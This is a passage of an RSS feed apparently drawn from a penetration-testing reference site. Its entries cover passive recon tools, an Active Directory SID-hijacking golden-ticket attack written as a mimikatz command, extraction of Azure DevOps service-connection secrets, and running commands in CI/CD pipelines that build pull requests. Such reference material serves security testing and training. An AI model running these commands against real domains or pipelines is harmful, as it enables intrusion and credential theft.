&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>Bug Hunting Methodology</title><link>https://bokkapig.pages.dev/refs/internal/methodology/bug-hunting-methodology/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/methodology/bug-hunting-methodology/</guid><description>&lt;h2 id="passive-recon" class="anchored-heading"&gt;Passive Recon&lt;a class="heading-anchor" href="#passive-recon" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Using &lt;a href="https://www.shodan.io/"&gt;shodan.io&lt;/a&gt;, &lt;a href="https://en.fofa.info/"&gt;fofa.info&lt;/a&gt;, &lt;a href="https://www.zoomeye.ai/"&gt;zoomeye.ai&lt;/a&gt; or &lt;a href="https://search.odin.io/hosts"&gt;odin.io&lt;/a&gt; to detect similar app&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# https://github.com/glennzw/shodan-hq-nse&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nmap&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-script&lt;/span&gt; &lt;span class="nb"&gt;shodan-hq&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;nse&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-script-args&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;apikey=&amp;lt;yourShodanAPIKey&amp;gt;,target=&amp;lt;hackme&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Search for similar websites using the same favicon: &lt;a href="https://github.com/pielco11/fav-up"&gt;pielco11/fav-up&lt;/a&gt; or slightly different icon: &lt;a href="https://profundis.io/tools/favicon-matcher"&gt;profundis.io/favicon-matcher&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;favUp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-favicon&lt;/span&gt;&lt;span class="o"&gt;-file&lt;/span&gt; &lt;span class="n"&gt;favicon&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ico&lt;/span&gt; &lt;span class="n"&gt;-sc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;favUp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-favicon-url&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;behind&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cloudflare&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;assets&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;favicon&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ico&lt;/span&gt; &lt;span class="n"&gt;-sc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;favUp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-web&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;behind&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cloudflare&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Search inside Shortener URLs: &lt;a href="https://shorteners.grayhatwarfare.com/"&gt;shorteners.grayhatwarfare.com&lt;/a&gt;, &lt;a href="https://github.com/utkusen/urlhunter"&gt;utkusen/urlhunter&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;urlhunter&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-keywords&lt;/span&gt; &lt;span class="n"&gt;keywords&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-date&lt;/span&gt; &lt;span class="mf"&gt;2020&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;11&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;20&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Search inside Buckets: &lt;a href="https://buckets.grayhatwarfare.com/"&gt;buckets.grayhatwarfare.com&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Using &lt;a href="https://archive.org/web/"&gt;The Wayback Machine&lt;/a&gt; to detect forgotten endpoints&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Look for JS files, old links&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="n"&gt;-sX&lt;/span&gt; &lt;span class="n"&gt;GET&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;http://web.archive.org/cdx/search/cdx?url=&amp;lt;targetDomain.com&amp;gt;&amp;amp;output=text&amp;amp;fl=original&amp;amp;collapse=urlkey&amp;amp;matchType=prefix&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Using &lt;a href="https://github.com/laramies/theHarvester"&gt;laramies/theHarvester&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;theHarvester&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;py&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt; &lt;span class="nb"&gt;all&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;d&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Look for private information in &lt;a href="https://github.com"&gt;GitHub&lt;/a&gt; repositories with &lt;a href="https://github.com/michenriksen/gitrob.git"&gt;michenriksen/GitRob&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;gitrob analyze johndoe --site&lt;span class="o"&gt;=&lt;/span&gt;https://github.acme.com --endpoint&lt;span class="o"&gt;=&lt;/span&gt;https://github.acme.com/api/v3 --access-tokens&lt;span class="o"&gt;=&lt;/span&gt;token1,token2
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Perform Google Dorks search: &lt;a href="https://gist.github.com/ikuamike/c2611b171d64b823c1c1956129cbc055"&gt;ikuamike/GoogleDorking.md&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Child Domain to Forest Compromise - SID Hijacking</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/trust-sid-hijacking/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/trust-sid-hijacking/</guid><description>&lt;p&gt;Most trees are linked with dual sided trust relationships to allow for sharing of resources.
By default the first domain created if the Forest Root.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;KRBTGT Hash&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Find the SID of the domain&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;Convert-NameToSid&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;krbtgt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2941561648&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;383941485&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1389968811&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;502&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# with Impacket&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lookupsid&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="nv"&gt;@10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Replace 502 with 519 to represent Enterprise Admins&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Create golden ticket and attack parent domain.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;kerberos&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;golden&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;krbtgt&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;HASH_KRBTGT&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sid&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2941561648&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;383941485&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1389968811&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sids&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="n"&gt;-SID-SECOND-DOMAIN&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;519&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ptt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.alteredsecurity.com/adlab"&gt;Training - Attacking and Defending Active Directory Lab - Altered Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>CI/CD - Azure DevOps</title><link>https://bokkapig.pages.dev/refs/internal/devops/cicd-azure-devops/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/cicd-azure-devops/</guid><description>&lt;h2 id="azure-pipelines" class="anchored-heading"&gt;Azure Pipelines&lt;a class="heading-anchor" href="#azure-pipelines" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;The configuration files for azure pipelines are normally located in the root directory of the repository and called - &lt;code&gt;azure-pipelines.yml&lt;/code&gt;&lt;br&gt;
You can tell if the pipeline builds pull requests based on its trigger instructions. Look for &lt;code&gt;pr:&lt;/code&gt; instruction:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;trigger&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;branches&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;include&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="l"&gt;master&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="l"&gt;refs/tags/*&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;pr&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;- &lt;span class="l"&gt;master&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="secret-extractions" class="anchored-heading"&gt;Secret Extractions&lt;a class="heading-anchor" href="#secret-extractions" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Extract secrets for these service connection:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;AzureRM&lt;/li&gt;
&lt;li&gt;GitHub&lt;/li&gt;
&lt;li&gt;AWS&lt;/li&gt;
&lt;li&gt;SonarQube&lt;/li&gt;
&lt;li&gt;SSH&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;nord-stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;devops&lt;/span&gt; &lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-build-yaml&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;yml&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-build-type&lt;/span&gt; &lt;span class="n"&gt;ssh&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pulsesecurity.co.nz/advisories/Azure-Devops-Command-Injection"&gt;Azure DevOps CICD Pipelines - Command Injection with Parameters, Variables and a discussion on Runner hijacking - Sana Oshika - May 1 2023&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>CI/CD - BuildKite</title><link>https://bokkapig.pages.dev/refs/internal/devops/cicd-buildkite/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/cicd-buildkite/</guid><description>&lt;p&gt;The configuration files for BuildKite builds are located in &lt;code&gt;.buildkite/*.yml&lt;/code&gt;&lt;br&gt;
BuildKite build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.&lt;/p&gt;
&lt;p&gt;In order to run an OS command in a workflow that builds pull requests - simply add a &lt;code&gt;command&lt;/code&gt; instruction to the step.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;steps&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="nt"&gt;label&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Example Test&amp;#34;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;command&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;echo &amp;#34;Hello!&amp;#34;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>CI/CD - CircleCI</title><link>https://bokkapig.pages.dev/refs/internal/devops/cicd-circle-ci/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/cicd-circle-ci/</guid><description>&lt;p&gt;The configuration files for CircleCI builds are located in &lt;code&gt;.circleci/config.yml&lt;/code&gt;&lt;br&gt;
By default - CircleCI pipelines don&amp;rsquo;t build forked pull requests. It&amp;rsquo;s an opt-in feature that should be enabled by the pipeline owners.&lt;/p&gt;
&lt;p&gt;In order to run an OS command in a workflow that builds pull requests - simply add a &lt;code&gt;run&lt;/code&gt; instruction to the step.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;jobs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;build&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;docker&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="nt"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;cimg/base:2022.05&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;steps&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="nt"&gt;run&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;echo &amp;#34;Say hello to YAML!&amp;#34;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>CI/CD - Drone CI</title><link>https://bokkapig.pages.dev/refs/internal/devops/cicd-drone-ci/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/cicd-drone-ci/</guid><description>&lt;p&gt;The configuration files for Drone builds are located in &lt;code&gt;.drone.yml&lt;/code&gt;&lt;br&gt;
Drone build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.&lt;/p&gt;
&lt;p&gt;In order to run an OS command in a workflow that builds pull requests - simply add a &lt;code&gt;commands&lt;/code&gt; instruction to the step.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;steps&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="nt"&gt;name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;do-something&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;some-image:3.9&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;commands&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- {&lt;span class="l"&gt;Payload}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>CI/CD - GitHub Actions</title><link>https://bokkapig.pages.dev/refs/internal/devops/cicd-github-actions/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/cicd-github-actions/</guid><description>&lt;p&gt;GitHub Actions is GitHub’s built-in CI/CD automation tool that lets you build, test, and deploy your code right from your GitHub repository. It runs workflows triggered by events like code pushes, pull requests, or manual triggers.&lt;/p&gt;
&lt;h2 id="lab" class="anchored-heading"&gt;Lab&lt;a class="heading-anchor" href="#lab" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/messypoutine/gravy-overflow/"&gt;messypoutine/gravy-overflow&lt;/a&gt; - A GitHub Actions Supply Chain CTF / Goat&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="default-action" class="anchored-heading"&gt;Default Action&lt;a class="heading-anchor" href="#default-action" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
